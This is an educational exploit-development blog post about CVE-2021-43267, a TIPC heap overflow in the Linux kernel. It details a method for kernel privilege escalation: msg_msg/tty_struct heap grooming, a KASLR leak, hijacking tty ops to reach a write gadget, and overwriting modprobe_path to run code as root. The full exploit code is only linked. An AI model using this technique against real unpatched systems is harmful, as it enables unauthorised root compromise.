Exploiting CVE-2021-43267
[+] Introduction
A couple of weeks ago a heap overflow vulnerability in the TIPC subsystem of the Linux kernel was disclosed by Max van Amerongen (@maxpl0it). He posted a detailed write up about the bug on the SentinelLabs website.
It’s a pretty clear cut heap buffer overflow where we control the size and data of the overflow. I decided I wanted to embark on a small exploit development adventure to see how hard it would be to exploit this bug on a kernel with common mitigations in place (SMEP/SMAP/KASLR/KPTI).
If you came here to find novel new kernel exploitation strategies, you picked the wrong blogpost, sorry!
[+] TIPC?
To quote the TIPC webpage:
Have you ever wished you had the convenience of Unix Domain Sockets even when transmitting data between cluster nodes? Where you yourself determine the addresses you want to bind to and use? Where you don’t have to perform DNS lookups and worry about IP addresses? Where you don’t have to start timers to monitor the continuous existence of peer sockets? And yet without the downsides of that socket type, such as the risk of lingering inodes?
Well.. I have not. But then again, I’m just an opportunistic vulndev person.
Welcome to the Transparent Inter Process Communication service, TIPC in short, which gives you all of this, and a lot more.
Thanks for having me.
[+] How to tipc-over-udp?
In order to use the TIPC support provided by the Linux kernel you’ll have to compile
a kernel with TIPC enabled, or load the TIPC module which ships with many popular
distributions. To easily interface with the TIPC subsystem you can use the tipc
utility
which is part of iproute2
.
For example, to list all the node links you can issue tipc link list
. We want to
talk to the TIPC subsystem over UDP, and for that we’ll have to enable the UDP bearer
media. This can be done using tipc bearer enable media udp name <NAME> localip <SOMELOCALIP>
.
Under the hood the tipc
userland utility uses netlink messages (using address family
AF_TIPC
) to do its thing. Interestingly enough, these netlink messages can be sent
by any unprivileged user. So even if there’s no existing TIPC configuration in place,
this bug can still be exploited.
[+] How to reach the vulnerable code path?
So now we know how to enable the UDP listener for TIPC, how do we go about actually
reaching the vulnerable code? We’ll have to present ourselves as a valid node
and
establish a link
before we can trigger the MSG_CRYPTO
code path. We can find a
protocol specification on the TIPC webpage that details
everything about transport, addressing schemes, fragmentation and so on.
That’s a lot of really dry stuff though. I made some PCAPs of a tipc-over-udp session setup and with some hand-waving and reading the kernel source narrowed it down to a few packets we need to emit before we can start sending the messages we are interested in.
In short, a typical TIPC datagram starts with a header, that consist out of at least
six 32bit words in big endian byte order. Those are typically referred to as w0
through w5
.
This header is (optionally) followed by a payload. w0
encodes the TIPC version,
header size, payload size, the message ‘protocol’. There’s also a flag which
indicates whether this is a sequential message or not.
w1
encodes (among other things) a protocol message type specific to the protocol.
The header also specifies a node_id
in w3
which is a unique identifier a node
includes in every packet. Typically, nodes encode their IPv4 address to be their
node_id
.
A quick way to learn about the various bit fields of the
header format is by consulting net/tipc/msg.h
.
To establish a valid node link we send three packets:
protocol: LINK_CONFIG -> message type: DSC_REQ_MSG
protocol: LINK_PROTOCOL -> message type: RESET_MSG
protocol: LINK_PROTOCOL -> message type: STATE_MSG
The LINK_CONFIG
packet will advertise ourselves. The link is then reset with the
LINK_PROTOCOL
packet that has the RESET_MSG
message type. Finally, the link
is brought up by sending a LINK_PROTOCOL
packet with the STATE_MSG
message type.
Now we are actually in a state where we can send MSG_CRYPTO
TIPC packets and
start playing with the heap overflow bug.
[+] Corrupting some memories
A MSG_CRYPTO
TIPC packet payload looks like this:
struct tipc_aead_key {
char alg_name[TIPC_AEAD_ALG_NAME];
unsigned int keylen;
char key[];
};
As detailed in the SentinelLabs write up, the length of the kmalloc
’d heap buffer is determined
by taking the payload size from the TIPC packet header. After which the key is memcpy
’d
into this buffer with the length specified in the MSG_CRYPTO
structure.
At first you’d think that means the overflow uses uncontrolled data.. but you can
send TIPC packets that lie about the actual length of the payload
(by making tipc_hdr.payload_size
smaller than the actual payload size).
This passes all the checks and reaches the memcpy without the remainder of the
payload being discarded, giving us full control over the overflowed data. Great!
The length specified in keylen
will be passed to kmalloc
directly.
Smaller (up to 8KiB) heap objects allocated by the kernel using kmalloc
end up in
caches that are grouped by size (powers of two). You can have a peep at /proc/slabinfo
and look at the entries prefixed by kmalloc-
to get an overview of the general purpose
object cache sizes.
Since we can control the size of the heap buffer that will be allocated and overflowed, we can pick in which of these caches our object ends up. This is a great ability, as it allows us to overflow into adjacent kernel objects of a similar size!
[+] Defeating KASLR
If we want to do any kind of control flow hijacking we’re going to need an information leak to disclose (at least) some kernel text/data addresses so we can deduce the randomized base address.
It would be great if we could find some kernel objects that contain a pointer/offset/length field early on in their structure, and that can be made to return data back to userland somehow.
While googling I stumbled on this cool paper by some Pennsylvania State University students who dubbed objects with such properties “Elastic Objects”. Their research on the subject is quite exhaustive and covers Linux, BSD and XNU.. I definitley recommend checking it out.
Since we can pick arbitrarily sized allocations, we’re free to target any convenient
elastic object. I went with msg_msg
, which is popular choice amongst fellow exploitdevs. ;-)
The structure of a msg_msg
as defined in include/linux/msg.h
:
/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next;
void *security;
/* the actual message follows immediately */
};
You can easily allocate msg_msg
objects using the msgsnd
system call. And
they can be freed again using the msgrcv
system call. These system calls are
not to be confused with the sendmsg
and recvmsg
system calls btw, great naming scheme!
If we corrupt the m_ts
field of a msg_msg
object we can extend its size and get a relative kernel heap out-of-bounds
read back to userland when retrieving the message from the queue again using the msgrcv
system call.
A small problem with this is that overwriting the m_ts
field also requires
trampling over the struct list_head
members (a prev/next pointer). When msgrcv
is called and a matching message is found, it wants to unlink it from the linked list..
but since we’re still in the information leak stage of the exploit, we can’t put any legitimate/meaningful
pointers in there. Luckily, there’s a flag you can pass to msgrcv
called MSG_COPY
, which
will make a copy of the message and not unlink the original one, avoiding a bad pointer dereference.
So the basic strategy is to line up three objects like this:
msg_msg
msg_msg
some_interesting_object
and proceed to free the first msg_msg
object and allocate the MSG_CRYPTO
key
buffer into the hole it left behind. We corrupt the adjacent msg_msg
using the
buffer overflow and subsequently leak data from some_interesting_object
using
the msgrcv
system call with the MSG_COPY
flag set.
I chose to leak the data of tty_struct
, which can easily be allocated by open()‘ing
/dev/ptmx
. This tty_struct
holds all kinds of state related to the tty, and
starts off like this:
struct tty_struct {
int magic;
struct kref kref;
struct device *dev; /* class device or NULL (e.g. ptys, serdev) */
struct tty_driver *driver;
const struct tty_operations *ops;
int index;
...
}
A nice feature of this structure is the magic
at the very start, it allows us
to easily confirm the validity of our leak by comparing it against the expected
value TTY_MAGIC
(0x5401
). A few members later we find struct tty_operations *ops
which
points to a list of function pointers
associated with various operations. This points to somewhere in kernel .data, and
thus we can use it to defeat KASLR!
Depending on whether the tty_struct
being leaked belongs to a master pty or
slave pty (they are allocated in pairs) we’ll end up finding the address of ptm_unix98_ops
or pty_unix98_ops
.
As an added bonus, leaking tty_struct
also allows us to figure out the address
of the tty_struct
because tty_struct.ldisc_sem.read_wait.next
points to itself!
[+] Getting $RIP (or panic tryin’)
Naturally, the tty_operations
pointer is a nice target for overwriting to hijack
the kernel execution flow. So in the next stage of the exploit we start by spraying
a bunch of copies of a fake tty_operations
table. We can accurately guesstimate
the address of one of these sprayed copies by utilizing the heap pointer we leaked
in the previous step.
Now we repeatedly: allocate msg_msg, allocate tty_struct(s), free msg_msg, trigger
TIPC bug to (hopefully) overflow into a tty_struct
. To confirm we actually overwrote
(the first part) of a tty_struct we invoke ioctl
on the fd
we got from opening
/dev/ptmx
, this will call tty_struct.ops.ioctl
and should get us control over $RIP
if we managed to hijack the ops
pointer of this object. If its not the case, we
close()
the pty again to not exhaust resources.
[+] Avoiding ROP (mostly)
Where to jump to in the kernel? We could set up a ROP stack somewhere and pivot the stack into it.. but this can get messy quick, especially once you need to do cleanup and resume the kernel thread like nothing ever happened.
If we look at the prototype of the ioctl
callback from the ops
list, we see:
int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);
We can set both cmd
and arg
from the userland invocation easily!
So effectively we have an arbitrary function call where we control the 2nd
and 3rd argument (RSI
and RDX
respectively). Well, cmd
is actually truncated
to 32bit, but that’s good enough.
Let’s try to look for some gadget sequence that allows us to do an arbitrary write:
$ objdump -D -j .text ./vmlinux \
| grep -C1 'mov %rsi,(%rdx)' \
| grep -B2 ret
..
ffffffff812c51f5: 31 c0 xor %eax,%eax
ffffffff812c51f7: 48 89 32 mov %rsi,(%rdx)
ffffffff812c51fa: c3 ret
..
This one is convenient, it also clears rax
so the exploit can tell whether the
invocation was a success. We now have some arbitrary 64bit write gadget! (For some
definition of arbitrary, the value is always 32bit controlled + 32bit zeroes, but whatever)
[+]
Meet my friend: modprobe_path
Okay, we have this scuffed arbitrary write gadget we can repeatedly invoke, what do we
overwrite? Classic kernel exploits would target the cred
structure of the current
task to elevate the privileges to uid0. We could of course build an arbitrary read
mechanism in the same way we build the arbitrary write.. but lets try something else.
There are various scenarios in which the kernel will spawn a userland process
(using the usermode_helper
infrastructure in the kernel) to load additional
kernel modules when it thinks that is necessary. The process spawned to load
these modules is, of course: modprobe. The path to the modprobe binary is stored
in a global variable called modprobe_path
and this can be set by a privileged
user through the sysfs node /proc/sys/kernel/modprobe
.
This is a perfect candidate for overwriting using our write gadget. If we overwrite this path and convince the kernel we need some additional module support we can invoke any executable as root!
One of these modprobe scenarios is when you try to run a binary that has no known
magic, in fs/exec.c
we see:
/*
* cycle the list of binary formats handler, until one recognizes the image
*/
static int search_binary_handler(struct linux_binprm *bprm)
{
..
if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
..
}
request_module
ends up invoking call_modprobe
which spawns a modprobe process
based on the path from modprobe_path
.
[+] Closing Words
I hope you enjoyed the read. Feel free to reach out to point out any inaccuracies or feedback. The full exploit code can be found here
A succesful run of the exploit should look something like this: